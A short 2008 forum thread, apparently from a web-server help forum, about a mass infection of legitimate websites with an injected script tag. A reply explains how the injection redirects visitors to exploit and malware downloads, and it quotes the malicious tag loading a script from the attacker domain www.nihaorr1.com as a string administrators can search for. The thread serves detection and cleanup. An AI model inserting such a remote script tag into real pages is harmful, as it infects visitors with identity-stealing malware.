IIS 5 & IIS 6
Anyone know about www.nihaorr1.com/1.js?
Re: Anyone know about www.nihaorr1.com/1.js?
Aug 11, 2008 05:55 AM|kimrennin|LINK
The number of infected Web pages spiked to 282,000 in the past day, and appears to be growing. Network managers can check to see whether their Web pages are infected with the iFrame code by looking for a specific code string in the source code of the Web
page associated to an iFrame tag. The string is <script src=http://www.nihaorr1.com/1.js>, according to the security vendor.The worst part of it all is that these infestations are not in seamy Web sites, they are taking place in legitimate Web pages. An IFRAME
redirects the user to another page, where identity-stealing malware is downloaded onto their computer. So even users who think they are staying clean are not safe. The malicious page scans the visitors machine to find ways to compromise the visitors machine.
Exploits are then downloaded and used to infected the redirected visitor based on the
information found on the scan.